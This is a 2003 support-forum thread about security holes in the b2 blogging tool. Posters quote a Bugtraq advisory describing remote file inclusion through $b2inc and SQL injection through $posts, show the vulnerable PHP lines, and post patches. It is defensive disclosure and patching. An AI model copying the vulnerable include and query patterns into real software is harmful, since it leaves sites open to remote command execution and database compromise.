| View previous topic :: View next topic |
| Author |
Message |
michel v
Site Admin
Joined: 25 Jan 2002
Posts: 799
Location: Corsica
|
 Posted: Fri May 23, 2003 1:02 am Post subject: Security hole in last official b2 releases |
 |
|
There is a little security hole in the files gm-2-b2.php and blogger-2-b2.php in the b2tools/ directory.
I say "Little" because it's quite easy to correct, a correction will be done on CVS and a new release made shortly.
In the meanwhile, delete gm-2-b2.php and blogger-2-b2.php or do the following modifications in these files.
In gm-2-b2.php and blogger-2-b2.php, find this line: [php:1:86c891620c]include("b2config.php");[/php:1:86c891620c] and replace it with this line: [php:1:86c891620c]require('b2config.php');[/php:1:86c891620c] |
|
| Back to top |
|
 |
allusion
Joined: 16 Jun 2002
Posts: 73
Location: Houston
|
| Posted: Fri May 23, 2003 3:20 am Post subject: |
|
|
And of course if you're not using these files there's no real reason to keep them around after installation.
_________________
Matthew Mullenweg
Wordpress |
|
| Back to top |
|
|
lcf
Joined: 05 May 2003
Posts: 92
Location: Malaysia
|
| Posted: Fri May 23, 2003 5:11 am Post subject: |
|
|
| Quote: | I say "Little" because it's quite easy to correct, a correction will be done on CVS and a new release made shortly.
|
Wow! I can't wait for it! 
_________________
LcF
http://weblog.lcfwebsite.com |
|
| Back to top |
|
|
mikelittle
Joined: 11 May 2002
Posts: 376
Location: UK
|
| Posted: Wed Jun 04, 2003 1:47 am Post subject: More security problems. |
|
|
There have been another couple of security problems posted on the bugtraq mailing list.
| Quote: |
"b2 0.6.1 with ljupdate" allow remote command execution in
./b2-include/b2functions.php. A malicious user can inject an url in $b2inc,
and obtain command execution with web server privileges ( usually nobody ).
"b2 0.6.2 and prior" allow sql injection in ./blog.header.php. $posts isn´t
convert to integer, so we can inject a sql in this variable. In MySQL 4.x
UNION and subselects can be used to obtain privileges.
"b2 0.6.2 and prior" has a little flaw. Bored users can force server to read
a remote file using $b2inc in ./b2-include/b2menutop.php
|
I don't have access to the code to fix the first issue.
The second issue has been fixed in CVS. It is a simple change:
File blog.header.php line 69:
| Code: |
if ($posts)
$posts_per_page=$posts;
|
should be changed to
| Code: |
if ($posts) {
$posts = (int)$posts;
$posts_per_page=$posts;
}
|
The third has also been fixed in CVS.
File b2-include/b2menutop.php line 32
| Code: |
$menu = file($b2inc."/b2menutop.txt");
|
becomes
| Code: |
require_once("b2config.php");
$menu = file($b2inc."/b2menutop.txt");
|
Note this will cause an error if the file is loaded on its own. But that's ok it should only be included.
Mike
_________________
Mike Little
http://zed1.com/journalized/
"Share what you know. Learn what you don't." |
|
| Back to top |
|
|
cjc
Joined: 24 Dec 2002
Posts: 146
Location: New York
|
| Posted: Wed Jun 04, 2003 3:24 am Post subject: Re: More security problems. |
|
|
| mikelittle wrote: | There have been another couple of security problems posted on the bugtraq mailing list.
| Quote: |
"b2 0.6.1 with ljupdate" allow remote command execution in
./b2-include/b2functions.php. A malicious user can inject an url in $b2inc,
and obtain command execution with web server privileges ( usually nobody ).
|
I don't have access to the code to fix the first issue.
|
The fix is like the last one:
near the end of the b2-include/b2functions.php file, there is a line like:
| Code: | | require_once($b2inc."/lj_update.php"); |
Change this to:
| Code: |
require_once("b2config.php");
require_once($b2inc."/lj_update.php");
|
I'm not sure if these problems should be characterized as "little". Yes, they're easy to fix, but not fixing them can have serious consequences. There's a thread in the "Chat Away" forum where someone details his experience of being hacked because of the gm-2-b2.php problem. It should be noted that having php configured to be "register globals" off will stop this exploit, too. |
|
| Back to top |
|
|
Mister44
Joined: 31 Oct 2002
Posts: 237
Location: Philadelphia, PA, USA
|
| Posted: Wed Jun 04, 2003 12:58 pm Post subject: |
|
|
| For LjUpdate users, it's far better to update to the latest version... This was fixed two months ago according to my cvs logs. |
|
| Back to top |
|
|
michel v
Site Admin
Joined: 25 Jan 2002
Posts: 799
Location: Corsica
|
| Posted: Wed Jun 18, 2003 10:59 pm Post subject: |
|
|
Mister44, please PM/email me with your Sourceforge ID so I can add you to the people able to do releases.
This way you can just release new versions of b2+ljupdate on the Sourceforge page.  |
|
| Back to top |
|
|
Sigg3
Joined: 03 Jul 2003
Posts: 760
Location: Oslo, Norway
|
|
| Back to top |
|
|
|
FAQ
Search
Memberlist
Usergroups
Register
Profile
Log in to check your private messages
Log in
